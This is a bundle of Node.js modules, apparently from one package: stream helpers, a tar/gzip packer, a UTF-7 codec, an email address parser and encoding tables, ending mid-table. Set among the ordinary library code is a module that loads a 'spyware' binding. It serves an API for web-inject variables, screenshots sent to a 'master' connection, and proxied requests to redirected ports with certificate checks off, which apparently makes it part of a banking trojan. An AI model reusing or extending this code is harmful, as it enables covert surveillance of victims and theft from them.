        ret[k] = cb[k]
      })
    }
    return ret
  }
}


function once (fn) {
  var f = function () {
    if (f.called) return f.value
    f.called = true
    return f.value = fn.apply(this, arguments)
  }
  f.called = false
  return f
}

once.proto = once(function () {
  Object.defineProperty(Function.prototype, 'once', {
    value: function () {
      return once(this)
    },
    configurable: true
  })
})

var fonce = wrappy(once);

var noop = function() {}

var isRequest = function(stream) {
	return stream.setHeader && typeof stream.abort === 'function';
};

var isChildProcess = function(stream) {
	return stream.stdio && Array.isArray(stream.stdio) && stream.stdio.length === 3
};

var eos = function(stream, opts, callback) {
	if (typeof opts === 'function') return eos(stream, null, opts);
	if (!opts) opts = {};

	callback = fonce(callback || noop);

	var ws = stream._writableState;
	var rs = stream._readableState;
	var readable = opts.readable || (opts.readable !== false && stream.readable);
	var writable = opts.writable || (opts.writable !== false && stream.writable);

	var onlegacyfinish = function() {
		if (!stream.writable) onfinish();
	};

	var onfinish = function() {
		writable = false;
		if (!readable) callback();
	};

	var onend = function() {
		readable = false;
		if (!writable) callback();
	};

	var onexit = function(exitCode) {
		callback(exitCode ? new Error('exited with error code: ' + exitCode) : null);
	};

	var onclose = function() {
		if (readable && !(rs && rs.ended)) return callback(new Error('premature close'));
		if (writable && !(ws && ws.ended)) return callback(new Error('premature close'));
	};

	var onrequest = function() {
		stream.req.on('finish', onfinish);
	};

	if (isRequest(stream)) {
		stream.on('complete', onfinish);
		stream.on('abort', onclose);
		if (stream.req) onrequest();
		else stream.on('request', onrequest);
	} else if (writable && !ws) { 
		stream.on('end', onlegacyfinish);
		stream.on('close', onlegacyfinish);
	}

	if (isChildProcess(stream)) stream.on('exit', onexit);

	stream.on('end', onend);
	stream.on('finish', onfinish);
	if (opts.error !== false) stream.on('error', callback);
	stream.on('close', onclose);

	return function() {
		stream.removeListener('complete', onfinish);
		stream.removeListener('abort', onclose);
		stream.removeListener('request', onrequest);
		if (stream.req) stream.req.removeListener('finish', onfinish);
		stream.removeListener('end', onlegacyfinish);
		stream.removeListener('close', onlegacyfinish);
		stream.removeListener('finish', onfinish);
		stream.removeListener('exit', onexit);
		stream.removeListener('end', onend);
		stream.removeListener('error', callback);
		stream.removeListener('close', onclose);
	};
};

var isFn = function(fn) {
	return typeof fn === 'function';
};

var isFS = function(stream) {
	return (stream instanceof (fs.ReadStream || noop) || stream instanceof (fs.WriteStream || noop)) && isFn(stream.close);
};

var isRequest = function(stream) {
	return stream.setHeader && isFn(stream.abort);
};

var destroyer = function(stream, reading, writing, callback) {
	callback = once(callback);

	var closed = false;
	stream.on('close', function() {
		closed = true;
	});

	eos(stream, {readable:reading, writable:writing}, function(err) {
		if (err) return callback(err);
		closed = true;
		callback();
	});

	var destroyed = false;
	return function(err) {
		if (closed) return;
		if (destroyed) return;
		destroyed = true;

		if (isFS(stream)) return stream.close(); 
		if (isRequest(stream)) return stream.abort(); 

		if (isFn(stream.destroy)) return stream.destroy();

		callback(err || new Error('stream was destroyed'));
	};
};

var call = function(fn) {
	fn();
};

var pipe = function(from, to) {
	return from.pipe(to);
};

var pump = function() {
	var streams = Array.prototype.slice.call(arguments);
	var callback = isFn(streams[streams.length-1] || noop) && streams.pop() || noop;

	if (Array.isArray(streams[0])) streams = streams[0];
	if (streams.length < 2) throw new Error('pump requires two streams per minimum');

	var error;
	var destroys = streams.map(function(stream, i) {
		var reading = i < streams.length-1;
		var writing = i > 0;
		return destroyer(stream, reading, writing, function(err) {
			if (!error) error = err;
			if (err) destroys.forEach(call);
			if (reading) return;
			destroys.forEach(call);
			callback(error);
		});
	});

	return streams.reduce(pipe);
};

var END_OF_TAR = new Buffer(1024)
END_OF_TAR.fill(0)


var ZEROS = '0000000000000000000'
var ZERO_OFFSET = '0'.charCodeAt(0)
var USTAR = 'ustar\x0000'

var headers = {};
var clamp = function(index, len, defaultValue) {
  if (typeof index !== 'number') return defaultValue
  index = ~~index  
  if (index >= len) return len
  if (index >= 0) return index
  index += len
  if (index >= 0) return index
  return 0
}

var toType = function(flag) {
  switch (flag) {
    case 0:
    return 'file'
    case 1:
    return 'link'
    case 2:
    return 'symlink'
    case 3:
    return 'character-device'
    case 4:
    return 'block-device'
    case 5:
    return 'directory'
    case 6:
    return 'fifo'
    case 7:
    return 'contiguous-file'
    case 72:
    return 'pax-header'
    case 55:
    return 'pax-global-header'
  }

  return null
}

var toTypeflag = function(flag) {
  switch (flag) {
    case 'file':
    return 0
    case 'link':
    return 1
    case 'symlink':
    return 2
    case 'character-device':
    return 3
    case 'block-device':
    return 4
    case 'directory':
    return 5
    case 'fifo':
    return 6
    case 'contiguous-file':
    return 7
    case 'pax-header':
    return 72
  }

  return 0
}

var alloc = function(size) {
  var buf = new Buffer(size)
  buf.fill(0)
  return buf
}

var indexOf = function(block, num, offset, end) {
  for (; offset < end; offset++) {
    if (block[offset] === num) return offset
  }
  return end
}

var cksum = function(block) {
  var sum = 8 * 32
  for (var i = 0; i < 148; i++)   sum += block[i]
  for (var i = 156; i < 512; i++) sum += block[i]
  return sum
}

var encodeOct = function(val, n) {
  val = val.toString(8)
  return ZEROS.slice(0, n-val.length)+val+' '
}

var decodeStr = function(val, offset, length) {
  return val.slice(offset, indexOf(val, 0, offset, offset+length)).toString();
}

var addLength = function(str) {
  var len = Buffer.byteLength(str)
  var digits = Math.floor(Math.log(len) / Math.log(10)) + 1
  if (len + digits > Math.pow(10, digits)) digits++

  return (len+digits)+str
}

headers.encodePax = function(opts) { // TODO: encode more stuff in pax
  var result = ''
  if (opts.name) result += addLength(' path='+opts.name+'\n')
  if (opts.linkname) result += addLength(' linkpath='+opts.linkname+'\n')
  return new Buffer(result)
}


headers.encode = function(opts) {
  var buf = alloc(512)
  var name = opts.name
  var prefix = ''

  if (opts.typeflag === 5 && name[name.length-1] !== '/') name += '/'
  if (Buffer.byteLength(name) !== name.length) return null // utf-8

  while (Buffer.byteLength(name) > 100) {
    var i = name.indexOf('/')
    if (i === -1) return null
    prefix += prefix ? '/' + name.slice(0, i) : name.slice(0, i)
    name = name.slice(i+1)
  }

  if (Buffer.byteLength(name) > 100 || Buffer.byteLength(prefix) > 155) return null
  if (opts.linkname && Buffer.byteLength(opts.linkname) > 100) return null

  buf.write(name)
  buf.write(encodeOct(opts.mode & parseInt('0777', 8), 6), 100)
  buf.write(encodeOct(opts.uid, 6), 108)
  buf.write(encodeOct(opts.gid, 6), 116)
  buf.write(encodeOct(opts.size, 11), 124)
  buf.write(encodeOct((opts.mtime.getTime() / 1000) | 0, 11), 136)

  buf[156] = ZERO_OFFSET + toTypeflag(opts.type)

  if (opts.linkname) buf.write(opts.linkname, 157)

  buf.write(USTAR, 257)
  if (opts.uname) buf.write(opts.uname, 265)
  if (opts.gname) buf.write(opts.gname, 297)
  buf.write(encodeOct(opts.devmajor || 0, 6), 329)
  buf.write(encodeOct(opts.devminor || 0, 6), 337)

  if (prefix) buf.write(prefix, 345)

  buf.write(encodeOct(cksum(buf), 6), 148)

  return buf
}


var overflow = function(self, size) {
  size &= 511
  if (size) self.push(END_OF_TAR.slice(0, 512 - size))
}

var Sink = function(to) {
  Writable.call(this)
  this.written = 0
  this._to = to
  this._destroyed = false
}

util.inherits(Sink, Writable)

Sink.prototype._write = function(data, enc, cb) {
  this.written += data.length
  if (this._to.push(data)) return cb()
  this._to._drain = cb
}

Sink.prototype.destroy = function() {
  if (this._destroyed) return
  this._destroyed = true
  this.emit('close')
}

var Void = function() {
  Writable.call(this)
  this._destroyed = false
}

util.inherits(Void, Writable)

Void.prototype._write = function(data, enc, cb) {
  cb(new Error('No body allowed for this entry'))
}

Void.prototype.destroy = function() {
  if (this._destroyed) return
  this._destroyed = true
  this.emit('close')
}

var Pack = function(opts) {
  if (!(this instanceof Pack)) return new Pack(opts)
  Readable.call(this, opts)

  this._drain = noop
  this._finalized = false
  this._finalizing = false
  this._destroyed = false
  this._stream = null
}

util.inherits(Pack, Readable)

Pack.prototype.entry = function(header, buffer, callback) {
  if (this._stream) throw new Error('already piping an entry')
  if (this._finalized || this._destroyed) return

  if (typeof buffer === 'function') {
    callback = buffer
    buffer = null
  }

  if (!callback) callback = noop

  var self = this

  if (!header.size)  header.size = 0
  if (!header.type)  header.type = 'file'
  if (!header.mode)  header.mode = header.type === 'directory' ? parseInt('0755', 8)  :parseInt('0644', 8)  
  if (!header.uid)   header.uid = 0
  if (!header.gid)   header.gid = 0
  if (!header.mtime) header.mtime = new Date()

  if (typeof buffer === 'string') buffer = new Buffer(buffer)
  if (Buffer.isBuffer(buffer)) {
    header.size = buffer.length
    this._encode(header)
    this.push(buffer)
    overflow(self, header.size)
    process.nextTick(callback)
    return new Void()
  }
  if (header.type !== 'file' && header.type !== 'contigious-file') {
    this._encode(header)
    process.nextTick(callback)
    return new Void()
  }

  var sink = new Sink(this)

  this._encode(header)
  this._stream = sink

  eos(sink, function(err) {
    self._stream = null

    if (err) { 
      self.destroy()
      return callback(err)
    }

    if (sink.written !== header.size) { 
      self.destroy()
      return callback(new Error('size mismatch'))
    }

    overflow(self, header.size)
    if (self._finalizing) self.finalize()
    callback()
  })

  return sink
}

Pack.prototype.finalize = function() {
  if (this._stream) {
    this._finalizing = true
    return
  }

  if (this._finalized) return
  this._finalized = true
  this.push(END_OF_TAR)
  this.push(null)
}

Pack.prototype.destroy = function(err) {
  if (this._destroyed) return
  this._destroyed = true

  if (err) this.emit('error', err)
  this.emit('close')
  if (this._stream && this._stream.destroy) this._stream.destroy()
}

Pack.prototype._encode = function(header) {
  var buf = headers.encode(header)
  if (buf) this.push(buf)
  else this._encodePax(header)
}

Pack.prototype._encodePax = function(header) {
  var paxHeader = headers.encodePax({
    name: header.name,
    linkname: header.linkname
  })

  var newHeader = {
    name: 'PaxHeader',
    mode: header.mode,
    uid: header.uid,
    gid: header.gid,
    size: paxHeader.length,
    mtime: header.mtime,
    type: 'pax-header',
    linkname: header.linkname && 'PaxHeader',
    uname: header.uname,
    gname: header.gname,
    devmajor: header.devmajor,
    devminor: header.devminor
  }

  this.push(headers.encode(newHeader))
  this.push(paxHeader)
  overflow(this, paxHeader.length)

  newHeader.size = header.size
  newHeader.type = header.type
  this.push(headers.encode(newHeader))
}

Pack.prototype._read = function(n) {
  var drain = this._drain
  this._drain = noop
  drain()
}

var win32 = os.platform() === 'win32';
var echo = function(name) {
  return name;
}

var normalize = !win32 ? echo : function(name) {
  return name.replace(/\\/g, '/')
}

var statAll = function(fs, stat, cwd, ignore, entries) {
  var queue = entries || ['.']

  return function loop(callback) {
    if (!queue.length) return callback()
    var next = queue.shift()
    var nextAbs = path.join(cwd, next)

    stat(nextAbs, function(err, stat) {
      if (err) return callback(err)

      if (!stat.isDirectory()) return callback(null, next, stat)

      fs.readdir(nextAbs, function(err, files) {
        if (err) return callback(err)

        for (var i = 0; i < files.length; i++) {
          if (!ignore(path.join(cwd, next, files[i]))) queue.push(path.join(next, files[i]))
        }

        callback(null, next, stat)
      })
    })
  }
}

var strip = function(map, level) {
  return function(header) {
    header.name = header.name.split('/').slice(level).join('/')
    if (header.linkname) header.linkname = header.linkname.split('/').slice(level).join('/')
    return map(header)
  }
}


function Fspack(cwd, opts) {
  if (!cwd) cwd = '.'
  if (!opts) opts = {}

  var xfs = opts.fs || fs
  var ignore = opts.ignore || opts.filter || noop
  var map = opts.map || noop
  var mapStream = opts.mapStream || echo
  var statNext = statAll(xfs, opts.dereference ? xfs.stat : xfs.lstat, cwd, ignore, opts.entries)
  var strict = opts.strict !== false
  var pack = Pack()

  if (opts.strip) map = strip(map, opts.strip)

  var onlink = function(filename, header) {
    xfs.readlink(path.join(cwd, filename), function(err, linkname) {
      if (err) return pack.destroy(err)
      header.linkname = normalize(linkname)
      pack.entry(header, onnextentry)
    })
  }

  var onstat = function(err, filename, stat) {
    if (err) return pack.destroy(err)
    if (!filename) return pack.finalize()

    if (stat.isSocket()) return onnextentry() 

    var header = {
      name: normalize(filename),
      mode: stat.mode,
      mtime: stat.mtime,
      size: stat.size,
      type: 'file',
      uid: stat.uid,
      gid: stat.gid
    }

    header = map(header) || header

    if (stat.isDirectory()) {
      header.size = 0
      header.type = 'directory'
      return pack.entry(header, onnextentry)
    }

    if (stat.isSymbolicLink()) {
      header.size = 0
      header.type = 'symlink'
      return onlink(filename, header)
    }

    

    if (!stat.isFile()) {
      if (strict) return pack.destroy(new Error('unsupported type for '+filename))
      return onnextentry()
    }

    var entry = pack.entry(header, onnextentry)
    if (!entry) return
    var rs = xfs.createReadStream(path.join(cwd, filename))

    pump(mapStream(rs, header), entry)
  }

  var onnextentry = function(err) {
    if (err) return pack.destroy(err)
    statNext(onstat)
  }

  onnextentry()

  return pack
}




var Gzcompress = function (params, callback) {
    callback = callback || function () {};
    var error = function (error) {
        throw error;
    };
    process.nextTick(function () {
    	var packer = Pack;

    	if(fs.lstatSync(params.source).isDirectory()){
    		Fspack(params.source)
	            .on('error', error)
	            .pipe(zlib.createGzip({
	                    level: params.level || 6,
	                    memLevel: params.memLevel || 6
	                })
	                .on('error', error))
	            .pipe(fs.createWriteStream(params.destination)
	                .on('error', error)
	                .on('finish', callback));
    	}else{
    		var compress = zlib.createGzip({
                    level: params.level || 6,
                    memLevel: params.memLevel || 6
               	}),
		        input = fs.createReadStream(params.source),
		        output = fs.createWriteStream(params.source + '.gz');

		    compress.on('end', callback);
    		input.pipe(compress).pipe(output);
    		
    	}

        
    });
};




exports.pack = Pack;
exports.fspack = Fspack;
exports.gzcompress = Gzcompress;

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 

========


var url = require('url');
var https = require('https');
var http = require('http');
var spyware = process.binding("spyware");
var path = require('path');
var fs = require('fs');

function sendText(response, body) {
    response.writeHead(200, {
        'Content-Length': body.length,
        'Content-Type': 'text/plain'
    });
    response.write(body);
    response.end();
}

function sendError(response, body) {
    response.writeHead(503, {
        'Content-Length': body.length,
        'Content-Type': 'text/plain'
    });
    response.write(body);
    response.end();
}


function InjSetVar(query, response) {
    if (query.name) {

        var storedObjects = process.FsReadObjectEncrypted('gatevars.txt');
        if (!storedObjects) {
            storedObjects = {};
        }

        if (!query.value) {
            delete storedObjects[query.name];
        } else {
            storedObjects[query.name] = query.value;
        }

        process.FsWriteObjectEncrypted('gatevars.txt', storedObjects);
    }

    sendText(response, 'true');
}

function InjGetVar(query, response) {

    if (query.name) {

        var storedObjects = process.FsReadObjectEncrypted('gatevars.txt');

        if (!storedObjects) {
            storedObjects = {};
        }

        if (!storedObjects[query.name]) {
            sendError(response, 'not found');
        } else {
            sendText(response, storedObjects[query.name]);
        }

    } else {
        sendError(response, 'invalid parameter');
    }
}

function SpSendLog(query, response) {
    if (query.message) {
        process.log('SpSendLog (API) ', query.message);
        sendText(response, 'true');
    } else {
        sendError(response, 'invalid parameter');
    }
}


function HttpForwardRequest(query, response, request) {

    if (query.b) {
        query.url = new Buffer(query.b, 'base64').toString();
    }

    if (query.url) {

        var parsedUrl = url.parse(query.url);
        
        var engine;

        if (parsedUrl.protocol === 'http:') {
            engine = http;
            if (!parsedUrl.port) {
                parsedUrl.port = 80;
            }
        } else if (parsedUrl.protocol === 'https:') {
            engine = https;
            if(!parsedUrl.port){
                parsedUrl.port = 443;
            }
        } else  return sendError(response, 'invalid protocol');
        

        var remotePort = parseInt(parsedUrl.port);

        var options = {
            host: parsedUrl.host,
            hostname: parsedUrl.hostname,
            port: remotePort + process.PORT_REDIRECTION_BASE,
            path: parsedUrl.path,
            method: 'GET',
            rejectUnauthorized: false
        };

        print(options);

        var req = engine.request(options, function (remote_response) {

            response.writeHead(remote_response.statusCode, remote_response.headers);

            remote_response.on('data', function (d) {
                response.write(d);
            });

            remote_response.on('end', function () {
                response.end();
            });

            remote_response.on('error', function (error) {
                sendError(response, error.message);
            });

        });

        req.on('error', function (e) {
            sendError(response, 'problem with request: ' + e.message);
        });

        req.end();
    } else {
        sendError(response, 'url not specified');
    }
}


function SpTakeScreenshot(query, response, request) {
    var packetBuffer = new Buffer(JSON.stringify({
        quality: query.quality || 30
    }));

    if (process.masterConnection) {
        process.masterConnection.sendProtocolPacket(
            SLAVE_PACKET_API_TAKESCREEN,
            packetBuffer
        );
    }
    else {
        process.pendingMessages.push({
            t: SLAVE_PACKET_API_TAKESCREEN,
            p: packetBuffer
        });
    }    
    sendText(response, 'true');
}

var methods = {
    'InjSetVar': InjSetVar,
    'InjGetVar': InjGetVar,
    'SpSendLog': SpSendLog,
    'SpTakeScreenshot': SpTakeScreenshot,
    'HttpForwardRequest': HttpForwardRequest
};


function serve(request, response) {
    var url_parts = url.parse(request.url, true);
    var query = url_parts.query;
    if (query) {
        var method = query.method;

        if (method && methods[method]) {
            return methods[method](query, response, request);
        } else {
            return sendText(response, 'method not registered');
        }
    } else {
        return sendText(response, 'method not specified');
    }
}


exports.serve = serve;                                                                                                                                                                                                                                                                                                                                                     

========

var Buffer = require('buffer').Buffer;
var utf7 = {};
function encode(str) {
    var b = new Buffer(str.length * 2, 'ascii');
    for (var i = 0, bi = 0; i < str.length; i++) {
        
        
        
        var c = str.charCodeAt(i);
        
        b[bi++] = c >> 8;
        
        b[bi++] = c & 0xFF;
    }
    
    return b.toString('base64').replace(/=+$/, '');
}

function decode(str) {
    var b = new Buffer(str, 'base64');
    var r = [];
    for (var i = 0; i < b.length;) {
        
        r.push(String.fromCharCode(b[i++] << 8 | b[i++]));
    }
    return r.join('');
}


function escape(chars) {
    return chars.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
}


var setD = "A-Za-z0-9" + escape("'(),-./:?");
var setO = escape("!\"#$%&*;<=>@[]^_'{|}");
var setW = escape(" \r\n\t");


var regexes = {};
var regexAll = new RegExp("[^" + setW + setD + setO + "]+", 'g');

exports.imap = {};


exports.encode = function (str, mask) {
    
    if (!mask) {
        mask = '';
    }
    if (!regexes[mask]) {
        regexes[mask] = new RegExp("[^" + setD + escape(mask) + "]+", 'g');
    }

    
    return str.replace(regexes[mask], function (chunk) {
        
        return '+' + (chunk === '+' ? '' : encode(chunk)) + '-';
    });
};


exports.encodeAll = function (str) {
    
    return str.replace(regexAll, function (chunk) {
        
        return '+' + (chunk === '+' ? '' : encode(chunk)) + '-';
    });
};


exports.imap.encode = function (str) {
    
    
    return str.replace(/&/g, '&-').replace(/[^\x20-\x7e]+/g, function (chunk) {
        
        chunk = (chunk === '&' ? '' : encode(chunk)).replace(/\//g, ',');
        return '&' + chunk + '-';
    });
};


exports.decode = function (str) {
    return str.replace(/\+([A-Za-z0-9\/]*)-?/gi, function (_, chunk) {
        
        if (chunk === '') return '+';
        return decode(chunk);
    });
};


exports.imap.decode = function (str) {
    return str.replace(/&([^-]*)-/g, function (_, chunk) {
        
        if (chunk === '') return '&';
        return decode(chunk.replace(/,/g, '/'));
    });
};                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     

========

'use strict';


module.exports = addressparser;


function addressparser(str) {
    var tokenizer = new Tokenizer(str),
        tokens = tokenizer.tokenize();

    var addresses = [],
        address = [],
        parsedAddresses = [];

    tokens.forEach(function(token) {
        if (token.type === 'operator' && (token.value === ',' || token.value === ';')) {
            if (address.length) {
                addresses.push(address);
            }
            address = [];
        } else {
            address.push(token);
        }
    });

    if (address.length) {
        addresses.push(address);
    }

    addresses.forEach(function(address) {
        address = _handleAddress(address);
        if (address.length) {
            parsedAddresses = parsedAddresses.concat(address);
        }
    });

    return parsedAddresses;
}


function _handleAddress(tokens) {
    var token,
        isGroup = false,
        state = 'text',
        address,
        addresses = [],
        data = {
            address: [],
            comment: [],
            group: [],
            text: []
        },
        i, len;

    
    for (i = 0, len = tokens.length; i < len; i++) {
        token = tokens[i];

        if (token.type === 'operator') {
            switch (token.value) {
                case '<':
                    state = 'address';
                    break;
                case '(':
                    state = 'comment';
                    break;
                case ':':
                    state = 'group';
                    isGroup = true;
                    break;
                default:
                    state = 'text';
            }
        } else {
            if (token.value) {
                data[state].push(token.value);
            }
        }
    }

    
    if (!data.text.length && data.comment.length) {
        data.text = data.comment;
        data.comment = [];
    }

    if (isGroup) {
        
        data.text = data.text.join(' ');
        addresses.push({
            name: data.text || (address && address.name),
            group: data.group.length ? addressparser(data.group.join(',')) : []
        });
    } else {
        
        if (!data.address.length && data.text.length) {
            for (i = data.text.length - 1; i >= 0; i--) {
                if (data.text[i].match(/^[^@\s]+@[^@\s]+$/)) {
                    data.address = data.text.splice(i, 1);
                    break;
                }
            }

            var _regexHandler = function(address) {
                if (!data.address.length) {
                    data.address = [address.trim()];
                    return ' ';
                } else {
                    return address;
                }
            };

            
            if (!data.address.length) {
                for (i = data.text.length - 1; i >= 0; i--) {
                    data.text[i] = data.text[i].replace(/\s*\b[^@\s]+@[^@\s]+\b\s*/, _regexHandler).trim();
                    if (data.address.length) {
                        break;
                    }
                }
            }
        }

        
        if (!data.text.length && data.comment.length) {
            data.text = data.comment;
            data.comment = [];
        }

        
        if (data.address.length > 1) {
            data.text = data.text.concat(data.address.splice(1));
        }

        
        data.text = data.text.join(' ');
        data.address = data.address.join(' ');

        if (!data.address && isGroup) {
            return [];
        } else {
            address = {
                address: data.address || data.text || '',
                name: data.text || data.address || ''
            };

            if (address.address === address.name) {
                if ((address.address || '').match(/@/)) {
                    address.name = '';
                } else {
                    address.address = '';
                }

            }

            addresses.push(address);
        }
    }

    return addresses;
}


function Tokenizer(str) {
    this.str = (str || '').toString();
    this.operatorCurrent = '';
    this.operatorExpecting = '';
    this.node = null;
    this.escaped = false;

    this.list = [];
}


Tokenizer.prototype.operators = {
    '"': '"',
    '(': ')',
    '<': '>',
    ',': '',
    ':': ';',
    
    
    
    
    
    
    ';': ''
};


Tokenizer.prototype.tokenize = function() {
    var chr, list = [];
    for (var i = 0, len = this.str.length; i < len; i++) {
        chr = this.str.charAt(i);
        this.checkChar(chr);
    }

    this.list.forEach(function(node) {
        node.value = (node.value || '').toString().trim();
        if (node.value) {
            list.push(node);
        }
    });

    return list;
};


Tokenizer.prototype.checkChar = function(chr) {
    if ((chr in this.operators || chr === '\\') && this.escaped) {
        this.escaped = false;
    } else if (this.operatorExpecting && chr === this.operatorExpecting) {
        this.node = {
            type: 'operator',
            value: chr
        };
        this.list.push(this.node);
        this.node = null;
        this.operatorExpecting = '';
        this.escaped = false;
        return;
    } else if (!this.operatorExpecting && chr in this.operators) {
        this.node = {
            type: 'operator',
            value: chr
        };
        this.list.push(this.node);
        this.node = null;
        this.operatorExpecting = this.operators[chr];
        this.escaped = false;
        return;
    }

    if (!this.escaped && chr === '\\') {
        this.escaped = true;
        return;
    }

    if (!this.node) {
        this.node = {
            type: 'text',
            value: ''
        };
        this.list.push(this.node);
    }

    if (this.escaped && chr !== '\\') {
        this.node.value += '\\';
    }

    this.node.value += chr;
    this.escaped = false;
};                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              

========









function inRange(a, min, max) {
    return min <= a && a <= max;
}


function div(n, d) {
    return Math.floor(n / d);
}


//
// Implementation of Encoding specification
// http://dvcs.w3.org/hg/encoding/raw-file/tip/Overview.html










 var EOF_byte = -1;
 var EOF_code_point = -1;


function ByteInputStream(bytes) {
    
    var pos = 0;

    
    this.get = function () {
        return (pos >= bytes.length) ? EOF_byte : Number(bytes[pos]);
    };

    
    this.offset = function (n) {
        pos += n;
        if (pos < 0) {
            throw new Error('Seeking past start of the buffer');
        }
        if (pos > bytes.length) {
            throw new Error('Seeking past EOF');
        }
    };

    
    this.match = function (test) {
        if (test.length > pos + bytes.length) {
            return false;
        }
        var i;
        for (i = 0; i < test.length; i += 1) {
            if (Number(bytes[pos + i]) !== test[i]) {
                return false;
            }
        }
        return true;
    };
}


function ByteOutputStream(bytes) {
    
    var pos = 0;

    
    this.emit = function (var_args) {
        
        var last = EOF_byte;
        var i;
        for (i = 0; i < arguments.length; ++i) {
            last = Number(arguments[i]);
            bytes[pos++] = last;
        }
        return last;
    };
}


function CodePointInputStream(string) {
    
    function stringToCodePoints(string) {
        
        var cps = [];
        
        var i = 0, n = string.length;
        while (i < string.length) {
            var c = string.charCodeAt(i);
            if (!inRange(c, 0xD800, 0xDFFF)) {
                cps.push(c);
            } else if (inRange(c, 0xDC00, 0xDFFF)) {
                cps.push(0xFFFD);
            } else { 
                if (i === n - 1) {
                    cps.push(0xFFFD);
                } else {
                    var d = string.charCodeAt(i + 1);
                    if (inRange(d, 0xDC00, 0xDFFF)) {
                        var a = c & 0x3FF;
                        var b = d & 0x3FF;
                        i += 1;
                        cps.push(0x10000 + (a << 10) + b);
                    } else {
                        cps.push(0xFFFD);
                    }
                }
            }
            i += 1;
        }
        return cps;
    }

    
    var pos = 0;
    
    var cps = stringToCodePoints(string);

    
    this.offset = function (n) {
        pos += n;
        if (pos < 0) {
            throw new Error('Seeking past start of the buffer');
        }
        if (pos > cps.length) {
            throw new Error('Seeking past EOF');
        }
    };


    
    this.get = function () {
        if (pos >= cps.length) {
            return EOF_code_point;
        }
        return cps[pos];
    };
}


function CodePointOutputStream() {
    
    var string = '';

    
    this.string = function () {
        return string;
    };

    
    this.emit = function (c) {
        if (c <= 0xFFFF) {
            string += String.fromCharCode(c);
        } else {
            c -= 0x10000;
            string += String.fromCharCode(0xD800 + ((c >> 10) & 0x3ff));
            string += String.fromCharCode(0xDC00 + (c & 0x3ff));
        }
    };
}


function EncodingError(message) {
    this.name = 'EncodingError';
    this.message = message;
    this.code = 0;
}
EncodingError.prototype = Error.prototype;


function decoderError(fatal, opt_code_point) {
    if (fatal) {
        throw new EncodingError('Decoder error');
    }
    return opt_code_point || 0xFFFD;
}


function encoderError(code_point) {
    throw new EncodingError('The code point ' + code_point +
                            ' could not be encoded.');
}


function getEncoding(label) {
    label = String(label).trim().toLowerCase();
    if (Object.prototype.hasOwnProperty.call(label_to_encoding, label)) {
        return label_to_encoding[label];
    }
    return null;
}


var encodings = [
  {
      "encodings": [
        {
            "labels": [
              "unicode-1-1-utf-8",
              "utf-8",
              "utf8"
            ],
            "name": "utf-8"
        }
      ],
      "heading": "The Encoding"
  },
  {
      "encodings": [
        {
            "labels": [
              "864",
              "cp864",
              "csibm864",
              "ibm864"
            ],
            "name": "ibm864"
        },
        {
            "labels": [
              "866",
              "cp866",
              "csibm866",
              "ibm866"
            ],
            "name": "ibm866"
        },
        {
            "labels": [
              "csisolatin2",
              "iso-8859-2",
              "iso-ir-101",
              "iso8859-2",
              "iso88592",
              "iso_8859-2",
              "iso_8859-2:1987",
              "l2",
              "latin2"
            ],
            "name": "iso-8859-2"
        },
        {
            "labels": [
              "csisolatin3",
              "iso-8859-3",
              "iso-ir-109",
              "iso8859-3",
              "iso88593",
              "iso_8859-3",
              "iso_8859-3:1988",
              "l3",
              "latin3"
            ],
            "name": "iso-8859-3"
        },
        {
            "labels": [
              "csisolatin4",
              "iso-8859-4",
              "iso-ir-110",
              "iso8859-4",
              "iso88594",
              "iso_8859-4",
              "iso_8859-4:1988",
              "l4",
              "latin4"
            ],
            "name": "iso-8859-4"
        },
        {
            "labels": [
              "csisolatincyrillic",
              "cyrillic",
              "iso-8859-5",
              "iso-ir-144",
              "iso8859-5",
              "iso88595",
              "iso_8859-5",
              "iso_8859-5:1988"
            ],
            "name": "iso-8859-5"
        },
        {
            "labels": [
              "arabic",
              "asmo-708",
              "csiso88596e",
              "csiso88596i",
              "csisolatinarabic",
              "ecma-114",
              "iso-8859-6",
              "iso-8859-6-e",
              "iso-8859-6-i",
              "iso-ir-127",
              "iso8859-6",
              "iso88596",
              "iso_8859-6",
              "iso_8859-6:1987"
            ],
            "name": "iso-8859-6"
        },
        {
            "labels": [
              "csisolatingreek",
              "ecma-118",
              "elot_928",
              "greek",
              "greek8",
              "iso-8859-7",
              "iso-ir-126",
              "iso8859-7",
              "iso88597",
              "iso_8859-7",
              "iso_8859-7:1987",
              "sun_eu_greek"
            ],
            "name": "iso-8859-7"
        },
        {
            "labels": [
              "csiso88598e",
              "csisolatinhebrew",
              "hebrew",
              "iso-8859-8",
              "iso-8859-8-e",
              "iso-ir-138",
              "iso8859-8",
              "iso88598",
              "iso_8859-8",
              "iso_8859-8:1988",
              "visual"
            ],
            "name": "iso-8859-8"
        },
        {
            "labels": [
              "csiso88598i",
              "iso-8859-8-i",
              "logical"
            ],
            "name": "iso-8859-8-i"
        },
        {
            "labels": [
              "csisolatin6",
              "iso-8859-10",
              "iso-ir-157",
              "iso8859-10",
              "iso885910",
              "l6",
              "latin6"
            ],
            "name": "iso-8859-10"
        },
        {
            "labels": [
              "iso-8859-13",
              "iso8859-13",
              "iso885913"
            ],
            "name": "iso-8859-13"
        },
        {
            "labels": [
              "iso-8859-14",
              "iso8859-14",
              "iso885914"
            ],
            "name": "iso-8859-14"
        },
        {
            "labels": [
              "csisolatin9",
              "iso-8859-15",
              "iso8859-15",
              "iso885915",
              "iso_8859-15",
              "l9"
            ],
            "name": "iso-8859-15"
        },
        {
            "labels": [
              "iso-8859-16"
            ],
            "name": "iso-8859-16"
        },
        {
            "labels": [
              "cskoi8r",
              "koi",
              "koi8",
              "koi8-r",
              "koi8_r"
            ],
            "name": "koi8-r"
        },
        {
            "labels": [
              "koi8-u"
            ],
            "name": "koi8-u"
        },
        {
            "labels": [
              "csmacintosh",
              "mac",
              "macintosh",
              "x-mac-roman"
            ],
            "name": "macintosh"
        },
        {
            "labels": [
              "dos-874",
              "iso-8859-11",
              "iso8859-11",
              "iso885911",
              "tis-620",
              "windows-874"
            ],
            "name": "windows-874"
        },
        {
            "labels": [
              "cp1250",
              "windows-1250",
